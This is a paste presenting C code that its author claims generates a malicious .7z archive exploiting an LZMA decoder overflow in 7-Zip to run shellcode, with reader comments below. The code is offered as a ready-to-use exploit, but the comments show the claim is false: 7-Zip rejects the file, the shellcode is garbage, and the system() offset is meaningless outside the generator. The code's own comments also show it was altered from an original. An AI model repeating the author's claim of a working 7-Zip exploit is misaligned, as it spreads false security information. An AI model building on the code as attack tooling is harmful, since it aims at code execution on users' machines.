
Mog

a guest
Dec 30th, 2024
  1. // by @nsa_employee39
  2.  
  3. // This exploit targets a vulnerability in the LZMA decoder of the 7-Zip software. It uses a crafted .7z archive with a malformed LZMA stream to trigger a buffer overflow condition in the RC_NORM function. By aligning offsets and payloads, the exploit manipulates the internal buffer pointers to execute shellcode which results in arbitrary code execution. When the victim opens/extracts the archive using a vulnerable version (current version) of 7-Zip, the exploit triggers, executing a payload that launches calc.exe (You can change this).
  4.  
  5. // offsets might need to be adjusted!!!
  6.  
  7.  
#include "LzmaEnc.h"
#include "LzmaDec.h"
#include "7z.h"
#include "7zAlloc.h"
#include "Xz.h"
#include "XzEnc.h"
#include "7zFile.h"
#include "7zStream.h"
#include "CpuArch.h"

#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
  21.  
/* Serialize a 32-bit value into buf[0..3], least-significant byte first.
 * buf must have room for 4 bytes; the caller is responsible for bounds. */
static void WriteUInt32LE(unsigned char* buf, UInt32 value) {
    for (unsigned idx = 0; idx < 4; idx++) {
        buf[idx] = (Byte)((value >> (8u * idx)) & 0xFF);
    }
}
  28.  
/* Serialize a 64-bit value into buf[0..7], least-significant byte first.
 * buf must have room for 8 bytes; the caller is responsible for bounds.
 * Not called anywhere in this file. */
static void WriteUInt64LE(unsigned char* buf, UInt64 value) {
    for (unsigned idx = 0; idx < 8; idx++) {
        buf[idx] = (Byte)((value >> (8u * idx)) & 0xFF);
    }
}
  39.  
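/*
 * Entry point: concatenates four fixed byte arrays (header, lzma_props,
 * malicious_lzma_stream, shellcode) into one heap buffer and writes the
 * result to "exploit.7z" in the current directory.
 *
 * Returns 0 when the file was fully written, 1 on any failure (allocation,
 * open, short write, close). The output bytes are the same as the original
 * program produced; only the error handling and an out-of-bounds stack write
 * in the generator itself were fixed.
 */
int main(void) {
    unsigned char shellcode[] = {
        0x55, 0x89, 0xE5, 0x83, 0xEC, 0x08, 0xC7, 0x04, 0x24,
        'c', 'a', 'l', 'c', 0x00, 0xCC, 0xCC, 0xCC, 0x89, 0xEC, 0x5D, 0xC3
    };

    size_t shellcodeSize = sizeof(shellcode);
    /* Position inside shellcode that receives the 4-byte displacement. */
    const size_t patchOffset = 18;
    /* Used only in the displacement arithmetic below; it is not the same
     * value as patchOffset (0x39 = 57 vs 18) and the file does not explain
     * the difference. */
    UInt32 addressOfSystemOffset = 0x39;

    /* The displacement is computed from this generator's own address space:
     * the address of system() in this process minus a position relative to
     * this stack array. As the page comments point out, that value has no
     * meaning in any other process. Integer arithmetic on uintptr_t is used
     * instead of subtracting pointers into unrelated objects (undefined
     * behaviour); the resulting value is the same. */
    UInt32 jmpOffset = (UInt32)((uintptr_t)&system
                                - ((uintptr_t)shellcode + addressOfSystemOffset + 4));

    if (patchOffset >= shellcodeSize) {
        fprintf(stderr, "patch offset %zu is outside the %zu-byte shellcode\n",
                patchOffset, shellcodeSize);
        return 1;
    }
    /* The original wrote 4 bytes at shellcode + 18 into a 21-byte array, so
     * the last byte landed one past the end of the stack buffer. Only the
     * bytes that fit are stored; the overflowed byte was never part of the
     * output file anyway (the file copies sizeof(shellcode) bytes). */
    unsigned char disp[4];
    WriteUInt32LE(disp, jmpOffset);
    size_t room = shellcodeSize - patchOffset;
    memcpy(shellcode + patchOffset, disp, room < sizeof(disp) ? room : sizeof(disp));

    unsigned char malicious_lzma_stream[] = {
        0x5D, 0x00, 0x00, 0x00, 0x01, 0x00,
        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
        0xFF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
    };

    /* Fixed 28-byte block beginning with the 7z signature bytes; the
     * remaining fields are kept exactly as the author gave them (the page
     * comments report 7-Zip rejects the result as "Is not archive"). */
    unsigned char header[] = {
        '7', 'z', 0xBC, 0xAF, 0x27, 0x1C, 0x00, 0x04, 0x03, 0x5B, 0xA8, 0x6F,
        0x25, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8F, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
    };

    /* Same six bytes that also open malicious_lzma_stream. */
    unsigned char lzma_props[] = { 0x5D, 0x00, 0x00, 0x00, 0x01, 0x00 };

    size_t payloadSize = sizeof(header) + sizeof(lzma_props) + sizeof(malicious_lzma_stream) + sizeof(shellcode);
    unsigned char *payload = malloc(payloadSize);
    if (!payload) {
        perror("malloc");
        return 1;
    }

    /* Lay the four arrays out back to back in the order listed above. */
    unsigned char *p = payload;
    memcpy(p, header, sizeof(header));                               p += sizeof(header);
    memcpy(p, lzma_props, sizeof(lzma_props));                       p += sizeof(lzma_props);
    memcpy(p, malicious_lzma_stream, sizeof(malicious_lzma_stream)); p += sizeof(malicious_lzma_stream);
    memcpy(p, shellcode, sizeof(shellcode));

    int rc = 1;
    FILE *f = fopen("exploit.7z", "wb");
    if (!f) {
        perror("Failed to create exploit.7z");
        goto out_free;
    }

    /* fwrite may write fewer bytes than requested; treat that as failure. */
    if (fwrite(payload, 1, payloadSize, f) != payloadSize) {
        perror("Failed to write exploit.7z");
        fclose(f);
        goto out_free;
    }
    /* fclose flushes buffered data, so its result matters for a write stream. */
    if (fclose(f) != 0) {
        perror("Failed to close exploit.7z");
        goto out_free;
    }
    rc = 0;

out_free:
    free(payload);
    return rc;
}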
  94.  
Comments
  • syrobonkus
    121 days
    1. Thanks for enabling comments!
    2. Various reasons this is garbage:
    3. - Executing shellcode without bypassing DEP
    4. - Saying to 'just jump to system()' without having an ASLR leak
    5. - 7zip doesn't even open this, you get "Error: Is not archive"
    6. - Includes 9 different header files and uses none of them except 7zip's types
    7. - Igor Pavlov (the creator of 7zip) does not believe this vulnerability exists
    8. - The 'shellcode' is complete garbage. I compiled the program and had it print the shellcode (since it modifies it); here it is in assembly:
    9. push rbp
    10. mov ebp,esp
    11. sub esp,0x8
    12. mov DWORD PTR [rsp],0x636c6163
    13. add ah,cl
    14. int3
    15. int3
    16. .byte 0x89
    17. .byte 0x83
    18. rex.W
    19. rex
    20.  
    21. Please proceed to ignore anything else this guy posts,
    22. - a real exploit developer
    • jeanpierre7018
      121 days
      1. Bonus round:
      2. - Using system() as an offset of the shellcode variable within the exploit generator program
      3. - Only person saying "waow exploit working" is a literal sockpuppet account
      • invpcid
        121 days
        1. bonus round #2:
        2. system just jumps to the actual system function, the offset lands you somewhere in the cwait function lmao
        3. https://imgur.com/a/j2st92T